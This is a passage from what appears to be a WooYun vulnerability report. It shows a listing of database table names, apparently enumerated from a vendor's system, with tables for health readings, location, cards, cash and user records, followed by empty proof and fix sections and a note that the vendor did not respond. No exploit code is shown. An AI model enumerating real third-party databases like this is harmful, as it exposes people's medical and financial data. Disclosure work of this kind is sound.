| ZL_BLOOD_PRESSURE              |
| ZL_BLOOD_SUGAR                 |
| ZL_BUSINESS_INFO               |
| ZL_BUSINESS_RECORD             |
| ZL_CAMERA_INFO                 |
| ZL_CARD                        |
| ZL_CASH                        |
| ZL_EAR_TEMPERATURE             |
| ZL_ELECTROCARDIOGRAM           |
| ZL_FAMILY_SAFETY_INFO          |
| ZL_FAVORABLE_EXERCISE_INFO     |
| ZL_HEALTH                      |
| ZL_HEALTH_DISPOSE              |
| ZL_HEALTH_EAR                  |
| ZL_HEALTH_HEARTRATE            |
| ZL_HEALTH_MANAGER              |
| ZL_HEALTH_OXYGEN               |
| ZL_HEALTH_SUGAR                |
| ZL_HOUSEKEEPING_INFO           |
| ZL_LOCATION_INFO               |
| ZL_MEDICAL_TREATMENT_INFO      |
| ZL_OLDUSER                     |
| ZL_PERSEONINFO                 |
| ZL_PHONE_BUSINESS              |
| ZL_PHYSICAL_EXAMINATION        |
| ZL_SERVICE_HISTORY             |
| ZL_SNS                         |
| ZL_USER                        |
| ZL_VOLLUNTER                   |
| ZYW_CUSTOMER_INFO              |
| ZY_ADD_VIP                     |
| ZY_PHONE_DITUI                 |
+--------------------------------+

3.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)